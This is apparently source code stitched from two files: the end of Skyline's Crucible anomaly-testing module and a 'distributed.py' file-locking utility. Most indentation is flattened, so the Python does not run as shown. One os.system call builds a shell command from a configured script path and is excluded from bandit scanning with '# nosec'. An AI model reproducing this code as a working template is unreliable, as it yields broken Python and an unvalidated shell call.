logger.info('failed to read graphite_override_uri_parameters variable from check file setting to False')
# yes this is a string
graphite_override_uri_parameters = False
else:
graphite_override_uri_parameters = str(metric_vars.graphite_override_uri_parameters)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric variable - graphite_override_uri_parameters - %s' % graphite_override_uri_parameters)
# Only check if the metric does not have an EXPIRATION_TIME key set.
# Crucible uses the alert EXPIRATION_TIME for the relevant alert setting
# context, whether that be analyzer, mirage, boundary, etc, and sets its
# own cache_keys in redis. This prevents large amounts of data being added
# in terms of timeseries json and image files, as crucible samples at the
# same EXPIRATION_TIME as alerts.
source_app = 'crucible'
expiration_timeout = 1800
remove_all_anomaly_files = False
check_expired = False
check_time = time()
if added_by == 'analyzer' or added_by == 'mirage':
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('Will check %s ALERTS' % added_by)
if settings.ENABLE_ALERTS:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('Checking %s ALERTS' % added_by)
for alert in settings.ALERTS:
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = metric
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
source_app = added_by
expiration_timeout = alert[2]
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout)))
check_age = int(check_time) - int(metric_timestamp)
if int(check_age) > int(expiration_timeout):
check_expired = True
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired')
if added_by == 'boundary':
if settings.BOUNDARY_ENABLE_ALERTS:
for alert in settings.BOUNDARY_METRICS:
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = metric
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
source_app = 'boundary'
expiration_timeout = alert[2]
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('matched - %s - %s - EXPIRATION_TIME is %s' % (source_app, metric, str(expiration_timeout)))
check_age = int(check_time) - int(metric_timestamp)
if int(check_age) > int(expiration_timeout):
check_expired = True
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('the check is older than EXPIRATION_TIME for the metric - not checking - check_expired')
cache_key = 'crucible.last_check.%s.%s' % (source_app, metric)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('cache_key - crucible.last_check.%s.%s' % (source_app, metric))
# Only use the cache_key EXPIRATION_TIME if this is not a request to
# run_crucible_tests on a timeseries
if run_crucible_tests == 'False':
if check_expired:
logger.info('check_expired - not checking Redis key')
last_check = True
else:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('Checking if cache_key exists')
try:
last_check = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query cache_key for %s - %s - %s' % (source_app, metric, e))
logger.info('all anomaly files will be removed')
remove_all_anomaly_files = True
if not last_check:
try:
self.redis_conn.setex(cache_key, expiration_timeout, packb(value))
logger.info('set cache_key for %s - %s with timeout of %s' % (source_app, metric, str(expiration_timeout)))
except Exception as e:
logger.error('error :: could not query cache_key for %s - %s - %s' % (source_app, metric, e))
logger.info('all anomaly files will be removed')
remove_all_anomaly_files = True
else:
if check_expired:
logger.info('check_expired - all anomaly files will be removed')
remove_all_anomaly_files = True
else:
logger.info('cache_key is set and not expired for %s - %s - all anomaly files will be removed' % (source_app, metric))
remove_all_anomaly_files = True
# anomaly dir
if not os.path.exists(str(anomaly_dir)):
try:
# mkdir_p(skyline_app, str(anomaly_dir))
mkdir_p(anomaly_dir)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('created anomaly dir - %s' % str(anomaly_dir))
except:
logger.error('error :: failed to create anomaly_dir - %s' % str(anomaly_dir))
if not os.path.exists(str(anomaly_dir)):
logger.error('error :: anomaly_dir does not exist')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
else:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly dir exists - %s' % str(anomaly_dir))
failed_check_file = anomaly_dir + '/' + metric_timestamp + '.failed.check.' + metric + '.txt'
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('failed_check_file - %s' % str(failed_check_file))
# Retrieve data from graphite if necessary
anomaly_graph = anomaly_dir + '/' + metric + '.png'
anomaly_json = anomaly_dir + '/' + metric + '.json'
anomaly_json_gz = anomaly_json + '.gz'
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_graph - %s' % str(anomaly_graph))
logger.info('anomaly_json - %s' % str(anomaly_json))
logger.info('anomaly_json_gz - %s' % str(anomaly_json_gz))
# Some things added to crucible may not be added by a skyline app per se
# and if run_crucible_tests is string True then no anomaly files should
# be removed.
if run_crucible_tests == 'True':
remove_all_anomaly_files = False
# Remove check and anomaly files if the metric has a EXPIRATION_TIME
# cache_key set
if remove_all_anomaly_files:
if os.path.isfile(anomaly_graph):
try:
os.remove(anomaly_graph)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_graph removed - %s' % str(anomaly_graph))
except OSError:
pass
if os.path.isfile(anomaly_json):
try:
os.remove(anomaly_json)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_json removed - %s' % str(anomaly_json))
except OSError:
pass
if os.path.isfile(anomaly_json_gz):
try:
os.remove(anomaly_json_gz)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_json_gz removed - %s' % str(anomaly_json_gz))
except OSError:
pass
anomaly_txt_file = anomaly_dir + '/' + metric + '.txt'
if os.path.isfile(anomaly_txt_file):
try:
os.remove(anomaly_txt_file)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_txt_file removed - %s' % str(anomaly_txt_file))
except OSError:
pass
# TBD - this data would have to be added to the Panorama DB before
# it is removed
if os.path.isfile(str(metric_check_file)):
try:
os.remove(str(metric_check_file))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('metric_check_file removed - %s' % str(metric_check_file))
except OSError:
pass
if os.path.exists(str(anomaly_dir)):
try:
os.rmdir(str(anomaly_dir))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_dir removed - %s' % str(anomaly_dir))
except OSError:
pass
logger.info('check and anomaly files removed')
return
# Check if the image exists
if graphite_metric == 'True':
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('graphite_metric - %s' % (graphite_metric))
# Graphite timeouts
connect_timeout = int(settings.GRAPHITE_CONNECT_TIMEOUT)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('connect_timeout - %s' % str(connect_timeout))
read_timeout = int(settings.GRAPHITE_READ_TIMEOUT)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('read_timeout - %s' % str(read_timeout))
graphite_until = datetime.datetime.fromtimestamp(int(metric_timestamp)).strftime('%H:%M_%Y%m%d')
graphite_from = datetime.datetime.fromtimestamp(int(from_timestamp)).strftime('%H:%M_%Y%m%d')
# graphite URL
if settings.GRAPHITE_PORT != '':
url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + ':' + settings.GRAPHITE_PORT + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json'
else:
url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + '/render/?from=' + graphite_from + '&until=' + graphite_until + '&target=' + metric + '&format=json'
# @added 20190612 - Feature #3108: crucible - graphite_override_uri_parameters
# This metric variable is used to declare absolute graphite uri
# parameters
#from=00%3A00_20190527&until=23%3A59_20190612&target=movingMedian(nonNegativeDerivative(stats.zpf-watcher-prod-1-30g-doa2.vda.readTime)%2C24)
if graphite_override_uri_parameters:
if settings.GRAPHITE_PORT != '':
url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + ':' + settings.GRAPHITE_PORT + '/render/?' + graphite_override_uri_parameters + '&format=json'
else:
url = settings.GRAPHITE_PROTOCOL + '://' + settings.GRAPHITE_HOST + '/render/?' + graphite_override_uri_parameters + '&format=json'
logger.info('graphite url set from graphite_override_uri_parameters - %s' % (url))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('graphite url - %s' % (url))
if not os.path.isfile(anomaly_graph):
logger.info('retrieving png - surfacing %s graph from graphite from %s to %s' % (metric, graphite_from, graphite_until))
image_url = url.replace('&format=json', '')
graphite_image_file = anomaly_dir + '/' + metric + '.png'
if 'width' not in image_url:
image_url += '&width=586'
if 'height' not in image_url:
image_url += '&height=308'
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('graphite image url - %s' % (image_url))
image_url_timeout = int(connect_timeout)
image_data = None
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
image_data = urllib2.urlopen(image_url, timeout=image_url_timeout).read() # nosec
logger.info('url OK - %s' % (image_url))
except urllib2.URLError:
image_data = None
logger.error('error :: url bad - %s' % (image_url))
if image_data is not None:
with open(graphite_image_file, 'wb') as f:
f.write(image_data)
logger.info('retrieved - %s' % (anomaly_graph))
if python_version == 2:
os.chmod(graphite_image_file, 0644)
if python_version == 3:
os.chmod(graphite_image_file, mode=0o644)
else:
logger.error('error :: failed to retrieve - %s' % (anomaly_graph))
else:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_graph file exists - %s' % str(anomaly_graph))
if not os.path.isfile(anomaly_graph):
logger.error('error :: retrieve failed to surface %s graph from graphite' % (metric))
else:
logger.info('graph image exists - %s' % (anomaly_graph))
# Check if the json exists
if not os.path.isfile(anomaly_json_gz):
if not os.path.isfile(anomaly_json):
logger.info('surfacing timeseries data for %s from graphite from %s to %s' % (metric, graphite_from, graphite_until))
if requests.__version__ >= '2.4.0':
use_timeout = (int(connect_timeout), int(read_timeout))
else:
use_timeout = int(connect_timeout)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('use_timeout - %s' % (str(use_timeout)))
try:
r = requests.get(url, timeout=use_timeout)
js = r.json()
datapoints = js[0]['datapoints']
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('data retrieved OK')
except:
datapoints = [[None, int(graphite_until)]]
logger.error('error :: data retrieval failed')
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[1]), float(datapoint[0])]
converted.append(new_datapoint)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
except: # nosec
continue
with open(anomaly_json, 'w') as f:
f.write(json.dumps(converted))
if python_version == 2:
os.chmod(anomaly_json, 0644)
if python_version == 3:
os.chmod(anomaly_json, mode=0o644)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('json file - %s' % anomaly_json)
if not os.path.isfile(anomaly_json):
logger.error('error :: failed to surface %s json from graphite' % (metric))
# Move metric check file
try:
shutil.move(metric_check_file, failed_check_file)
logger.info('moved check file to - %s' % failed_check_file)
except OSError:
logger.error('error :: failed to move check file to - %s' % failed_check_file)
pass
return
# Check timeseries json exists - raw or gz
if not os.path.isfile(anomaly_json):
if not os.path.isfile(anomaly_json_gz):
logger.error('error :: no json data found')
# Move metric check file
try:
shutil.move(metric_check_file, failed_check_file)
logger.info('moved check file to - %s' % failed_check_file)
except OSError:
logger.error('error :: failed to move check file to - %s' % failed_check_file)
pass
return
else:
logger.info('timeseries json gzip exists - %s' % (anomaly_json_gz))
else:
logger.info('timeseries json exists - %s' % (anomaly_json))
# If the timeseries json exists and run_crucible_tests is str(False), gzip
# it and return here as there is nothing further to do
if run_crucible_tests == 'False':
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('run_crucible_tests - %s' % run_crucible_tests)
# gzip the json timeseries data
if os.path.isfile(anomaly_json):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('gzipping - %s' % anomaly_json)
try:
f_in = open(anomaly_json)
f_out = gzip.open(anomaly_json_gz, 'wb')
f_out.writelines(f_in)
f_out.close()
f_in.close()
os.remove(anomaly_json)
if python_version == 2:
os.chmod(anomaly_json_gz, 0644)
if python_version == 3:
os.chmod(anomaly_json_gz, mode=0o644)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('gzipped - %s' % anomaly_json_gz)
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
pass
return
except:
logger.error('error :: Failed to gzip data file - %s' % str(traceback.format_exc()))
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
pass
return
if os.path.isfile(anomaly_json_gz):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('gzip exists - %s' % anomaly_json)
try:
os.remove(metric_check_file)
logger.info('removed check file - %s' % metric_check_file)
except OSError:
pass
return
nothing_to_do = 'true - for debug only'
# self.check_if_parent_is_alive()
# Run crucible algorithms
logger.info('running crucible tests - %s' % (metric))
if os.path.isfile(anomaly_json_gz):
if not os.path.isfile(anomaly_json):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('ungzipping - %s' % anomaly_json_gz)
try:
# with gzip.open(anomaly_json_gz, 'rb') as fr:
fr = gzip.open(anomaly_json_gz, 'rb')
raw_timeseries = fr.read()
fr.close()
except Exception as e:
logger.error('error :: could not ungzip %s - %s' % (anomaly_json_gz, e))
traceback.print_exc()
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('ungzipped')
logger.info('writing to - %s' % anomaly_json)
with open(anomaly_json, 'w') as fw:
fw.write(raw_timeseries)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_json done')
if python_version == 2:
os.chmod(anomaly_json, 0644)
if python_version == 3:
os.chmod(anomaly_json, mode=0o644)
else:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('No gzip - %s' % anomaly_json_gz)
nothing_to_do = 'true - for debug only'
if os.path.isfile(anomaly_json):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomaly_json exists - %s' % anomaly_json)
if os.path.isfile(anomaly_json):
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('loading timeseries from - %s' % anomaly_json)
timeseries = None
try:
with open(anomaly_json, 'r') as f:
raw_timeseries = f.read()
timeseries = json.loads(raw_timeseries)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('loaded time series from - %s' % anomaly_json)
except:
# logger.error(traceback.format_exc())
logger.info('failed to load with JSON, literal_eval will be tried - %s' % anomaly_json)
# @added 20180715 - Task #2444: Evaluate CAD
# Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# If the json.loads fails use literal_eval
if not timeseries:
try:
with open(anomaly_json, 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
timeseries = literal_eval(timeseries_array_str)
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('loaded time series with literal_eval from - %s' % anomaly_json)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to load JSON - %s' % anomaly_json)
else:
try:
logger.error('error :: file not found - %s' % anomaly_json)
shutil.move(metric_check_file, failed_check_file)
if python_version == 2:
os.chmod(failed_check_file, 0644)
if python_version == 3:
os.chmod(failed_check_file, mode=0o644)
logger.info('moved check file to - %s' % failed_check_file)
except OSError:
logger.error('error :: failed to move check file to - %s' % failed_check_file)
pass
return
start_timestamp = int(timeseries[0][0])
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('start_timestamp - %s' % str(start_timestamp))
end_timestamp = int(timeseries[-1][0])
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('end_timestamp - %s' % str(end_timestamp))
full_duration = end_timestamp - start_timestamp
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('full_duration - %s' % str(full_duration))
self.check_if_parent_is_alive()
run_algorithms_start_timestamp = int(time())
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('run_algorithms_start_timestamp - %s' % str(run_algorithms_start_timestamp))
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('run_algorithms - %s,%s,%s,%s,%s,%s' % (metric, str(end_timestamp), str(full_duration), anomaly_json, skyline_app, str(algorithms)))
try:
anomalous, ensemble = run_algorithms(timeseries, str(metric), end_timestamp, full_duration, str(anomaly_json), skyline_app, algorithms)
except:
logger.error('error :: run_algorithms failed - %s' % str(traceback.format_exc()))
run_algorithms_end_timestamp = int(time())
run_algorithms_seconds = run_algorithms_end_timestamp - run_algorithms_start_timestamp
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomalous, ensemble - %s, %s' % (anomalous, str(ensemble)))
if anomalous:
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('anomalous - %s' % (anomalous))
nothing_to_do = 'true - for debug only'
logger.info('run_algorithms took %s seconds' % str(run_algorithms_seconds))
# Update anomaly file
crucible_data = 'crucible_tests_run = "%s"\n' \
'crucible_triggered_algorithms = %s\n' \
'tested_by = "%s"\n' \
% (str(run_timestamp), str(ensemble), str(this_host))
crucible_anomaly_file = '%s/%s.txt' % (anomaly_dir, metric)
with open(crucible_anomaly_file, 'a') as fh:
fh.write(crucible_data)
if python_version == 2:
os.chmod(crucible_anomaly_file, 0644)
if python_version == 3:
os.chmod(crucible_anomaly_file, mode=0o644)
logger.info('updated crucible anomaly file - %s/%s.txt' % (anomaly_dir, metric))
# gzip the json timeseries data after analysis
if os.path.isfile(anomaly_json):
if not os.path.isfile(anomaly_json_gz):
try:
f_in = open(anomaly_json)
f_out = gzip.open(anomaly_json_gz, 'wb')
f_out.writelines(f_in)
f_out.close()
f_in.close()
os.remove(anomaly_json)
if python_version == 2:
os.chmod(anomaly_json_gz, 0644)
if python_version == 3:
os.chmod(anomaly_json_gz, mode=0o644)
logger.info('gzipped - %s' % (anomaly_json_gz))
except:
logger.error('error :: Failed to gzip data file - %s' % str(traceback.format_exc()))
else:
os.remove(anomaly_json)
if run_script:
if os.path.isfile(run_script):
logger.info('running - %s' % (run_script))
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
os.system('%s %s' % (str(run_script), str(crucible_anomaly_file))) # nosec
# Remove metric check file
nothing_to_do = ''
try:
os.remove(metric_check_file)
logger.info('complete, removed check file - %s %s' % (metric_check_file, nothing_to_do))
except OSError:
pass
def run(self):
"""
Called when the process initializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
logger.info('process initialized')
while 1:
now = time()
if settings.ENABLE_CRUCIBLE_DEBUG:
logger.info('process started - %s' % int(now))
# Make sure check_dir exists and has not been removed
if settings.ENABLE_CRUCIBLE_DEBUG:
    logger.info('checking check dir exists - %s' % settings.CRUCIBLE_CHECK_PATH)
# os.path.exists() returns False rather than raising, so test its return value directly
if not os.path.exists(settings.CRUCIBLE_CHECK_PATH):
    logger.error('error :: check dir did not exist - %s' % settings.CRUCIBLE_CHECK_PATH)
    mkdir_p(settings.CRUCIBLE_CHECK_PATH)
    logger.info('check dir created - %s' % settings.CRUCIBLE_CHECK_PATH)
# continue
# Make sure Redis is up
try:
self.redis_conn.ping()
logger.info('connected to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
except:
logger.info('skyline can not connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
logger.info('connecting to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
if settings.REDIS_PASSWORD:
self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
else:
self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
continue
"""
Determine if any metric has been added to test
"""
while True:
# Report app up
self.redis_conn.setex(skyline_app, 120, now)
metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))]
# if len(metric_var_files) == 0:
if not metric_var_files:
logger.info('sleeping 10 - no metric check files')
sleep(10)
# Discover metric to analyze
metric_var_files = ''
metric_var_files = [f for f in listdir(settings.CRUCIBLE_CHECK_PATH) if isfile(join(settings.CRUCIBLE_CHECK_PATH, f))]
# if len(metric_var_files) > 0:
if metric_var_files:
break
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = settings.CRUCIBLE_CHECK_PATH + "/" + str(metric_var_files_sorted[0])
logger.info('assigning check for processing - %s' % str(metric_var_files_sorted[0]))
# Reset process_list
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# try:
# self.process_list[:] = []
# except:
# logger.error('error :: failed to reset self.process_list')
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
run_timestamp = int(now)
for i in range(1, settings.CRUCIBLE_PROCESSES + 1):
p = Process(target=self.spin_process, args=(i, run_timestamp, str(metric_check_file)))
pids.append(p)
pid_count += 1
logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.CRUCIBLE_PROCESSES)))
p.start()
spawned_pids.append(p.pid)
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_process has run
# for longer than CRUCIBLE_TESTS_TIMEOUT
p_starts = time()
while time() - p_starts <= settings.CRUCIBLE_TESTS_TIMEOUT:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.CRUCIBLE_PROCESSES), time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('%s :: stopping spin_process - %s' % (skyline_app, str(p.is_alive())))
p.join()
while os.path.isfile(metric_check_file):
sleep(1)
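# --- Illustrative sketch (not part of Skyline): the spawn/monitor/terminate pattern used in run() above.
# It spawns N worker processes, polls them until a timeout and terminates any stragglers, mirroring the
# CRUCIBLE_PROCESSES / CRUCIBLE_TESTS_TIMEOUT logic. All names below are hypothetical.
import time as _time
from multiprocessing import Process as _Process

def _run_workers_with_timeout(target, n_procs=2, timeout=10.0, poll=0.1):
    procs = [_Process(target=target, args=(i,)) for i in range(n_procs)]
    for p in procs:
        p.start()
    started = _time.time()
    while _time.time() - started <= timeout:
        if any(p.is_alive() for p in procs):
            _time.sleep(poll)      # just to avoid hogging the CPU
        else:
            break                  # all workers finished before the timeout
    else:
        # only reached if the while condition expired without a break
        for p in procs:
            p.terminate()
    for p in procs:
        p.join()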
|
distributed.py
|
HELP="""All related to distributed compute and atomic read/write
Thread Safe
Process Safe
Lock Mechanism
"""
import os, sys, socket, platform, time, gc, logging, random
###############################################################################################
from utilmy.utilmy import log, log2
def help():
from utilmy import help_create
ss = help_create("utilmy.distributed", prefixs= [ 'test']) #### Merge test code
ss += HELP
print(ss)
def log_mem(*s):
try:
# print(*s, "\n", flush=True)
import psutil
log2('mem check', str(psutil.virtual_memory()))
# print(s)
except:
pass
################################################################################################
# Test functions
def test_functions():
"""Check that list function is working.
os_lock_releaseLock, os_lock_releaseLock, os_lock_execute
Basic test on only 1 thread
"""
# test function
def running(fun_args):
print(f'Function running with arg: {fun_args}')
# test that os_lock_execute is working
os_lock_execute(running, 'Test_args', plock='tmp/plock.lock')
os_lock_execute(running, [1, 2, 3], plock='tmp/plock.lock')
def test_funtions_thread():
"""Check that list function is working.
os_lock_releaseLock, os_lock_releaseLock, os_lock_execute
Multi threads
How the test work.
- Create and run 5 threads. These threads try to access and use 1 function `running`
with os_lock_execute. So in one 1, only 1 thread can access and use this function.
"""
import threading
# define test function
def running(fun_args):
print(f'Function running in thread: {fun_args} START')
time.sleep(fun_args* 0.2)
print(f'Function running in thread: {fun_args} END')
# define test thread
def thread_running(number):
print(f'Thread {number} START')
os_lock_execute(running, number, plock='tmp/plock2.lock')
print(f'Thread {number} sleeping for {number * 0.5}s')
time.sleep(number* 0.5)
print(f'Thread {number} END')
# Create thread
for i in range(3):
t = threading.Thread(target=thread_running, args=(i+1, ))
t.start()
def test_index():
"""Check that class IndexLock is working
Multi threads
How the test works:
- The test creates the INDEX backed by a lock file
- Create 3 threads that try to write data through this INDEX file lock
- This test makes sure that, with this INDEX file lock,
  only 1 thread at a time can access and put data into the file.
  The others wait to acquire the lock until the holding thread releases it.
"""
import threading
file_name = "./test.txt"
#file_lock = "tmp/plock3.lock"
INDEX = IndexLock(file_name, file_lock=None)
#1. Create test file
#with open(file_name, mode='w+') as fp:
# pass
# define test thread
def thread_running(number):
print(f'Thread {number} START')
INDEX.put(f'Thread {number}')
INDEX.save_filter(f'Thread {number}')
print( INDEX.get() )
print(f'Thread {number} END')
# Create thread
for i in range(3):
t = threading.Thread(target=thread_running, args=(i+1, ))
t.start()
def test_tofilesafe():
pass
def test_all():
test_functions()
test_funtions_thread()
test_index()
#########################################################################################################
####### Atomic File writing ##############################################################################
class toFile(object):
def __init__(self,fpath):
"""
Thread Safe file writer
"""
# use a per-file logger so multiple toFile instances do not write into each other's files
logger = logging.getLogger('tofile_' + fpath)
logger.setLevel(logging.INFO)
if not logger.handlers:
    ch = logging.FileHandler(fpath)
    ch.setFormatter(logging.Formatter('%(message)s'))
    logger.addHandler(ch)
self.logger = logger
def write(self, msg):
self.logger.info( msg)
def to_file_safe(msg:str, fpath:str):
    """ Append msg to fpath via the logging module; the handler is removed afterwards
        so repeated calls do not duplicate output or leak file handles. """
    ss = str(msg)
    logger = logging.getLogger('log')
    logger.setLevel(logging.INFO)
    ch = logging.FileHandler(fpath)
    ch.setFormatter(logging.Formatter('%(message)s'))
    logger.addHandler(ch)
    try:
        logger.info(ss)
    finally:
        logger.removeHandler(ch)
        ch.close()
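# --- Illustrative usage sketch (the ztmp/ paths below are hypothetical and assumed writable). ---
# Build one toFile writer per output file and call .write() from any thread;
# to_file_safe() is the one-shot functional equivalent for a single message.
def test_tofile_example():
    import os, threading
    os.makedirs("ztmp", exist_ok=True)
    writer = toFile("ztmp/out_log.txt")
    threads = [threading.Thread(target=writer.write, args=(f"line {i}",)) for i in range(5)]
    for t in threads: t.start()
    for t in threads: t.join()
    to_file_safe("single message", "ztmp/out_log2.txt")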
#########################################################################################################
####### Atomic File Index read/writing #################################################################
class IndexLock(object):
"""Keep a Global Index of processed files.
INDEX = IndexLock(findex)
flist = index.save_isok(flist) ## Filter out files in index and return available files
### only process correct files
"""
### Manage Inventory Index with Atomic Write/Read
def __init__(self, findex, file_lock=None, min_size=5, skip_comment=True, ntry=20):
self.findex= findex
os.makedirs(os.path.dirname( os.path.abspath(self.findex)), exist_ok=True)
if file_lock is None:
file_lock = os.path.dirname(findex) +"/"+ findex.split("/")[-1].replace(".", "_lock.")
self.plock = file_lock
### Initiate the file
if not os.path.isfile(self.findex):
with open(self.findex, mode='a') as fp:
fp.write("")
self.min_size=min_size
self.skip_comment = skip_comment
self.ntry =ntry
def read(self,): ### alias
return self.get()
def save_isok(self, flist:list): ### Alias
    return self.put(flist)
def save_filter(self, val:list=None):
    return self.put(val)
######################################################################
def get(self, **kw):
## return the list of files
with open(self.findex, mode='r') as fp:
flist = fp.readlines()
if len(flist) < 1 : return []
flist2 = []
for t in flist :
if len(t) < self.min_size: continue
if self.skip_comment and t[0] == "#" : continue
flist2.append( t.strip() )
return flist2
def put(self, val:list=None):
""" Read, check if the insert values are there, and save the files
flist = index.check_filter(flist) ### Remove already processed files
if len(flist) < 1 : continue ### Dont process flist
### Need locking mechanism Common File to check for Check + Write locking.
"""
import random, time
if val is None : return True
if isinstance(val, str):
val = [val]
i = 1
while i < self.ntry :
try :
lock_fd = os_lock_acquireLock(self.plock)
### Check if files exist #####################
fall = self.read()
val2 = [] ; isok= True
for fi in val:
if fi in fall :
print('exist in Index, skipping', fi)
isok =False
else :
val2.append(fi)
if len(val2) < 1 :
    os_lock_releaseLock(lock_fd)  # release the file lock before the early return
    return []
#### Append the new files to the Index so they won't be picked up by other processes
ss = ""
for fi in val2 :
x = str(fi)
ss = ss + x.strip() + "\n"
with open(self.findex, mode='a') as fp:
fp.write( ss )
os_lock_releaseLock(lock_fd)
return val2
except Exception as e:
log2(f"file lock waiting {i}s")
time.sleep( random.random() * i )
i += 1
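# --- Illustrative usage sketch for IndexLock (file names below are hypothetical; the underlying
# os_lock_acquireLock uses fcntl, so this runs on POSIX systems). ---
# A worker filters its batch through the shared index: files already recorded are skipped,
# new ones are appended atomically under the file lock and returned for processing.
def _indexlock_example():
    index = IndexLock("ztmp/processed_files.txt")
    batch = ["data/part1.parquet", "data/part2.parquet"]
    todo = index.put(batch)           # returns only the files not already in the index
    for fname in todo:
        print("processing", fname)    # actual processing would go here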
class Index0(object):
"""
### to maintain global index, flist = index.read() index.save(flist)
"""
def __init__(self, findex:str="ztmp_file.txt", ntry=10):
self.findex = findex
os.makedirs(os.path.dirname(os.path.abspath(self.findex)), exist_ok=True)
if not os.path.isfile(self.findex):
with open(self.findex, mode='a') as fp:
fp.write("")
self.ntry= ntry
def read(self,):
import time
try :
with open(self.findex, mode='r') as fp:
flist = fp.readlines()
except:
time.sleep(5)
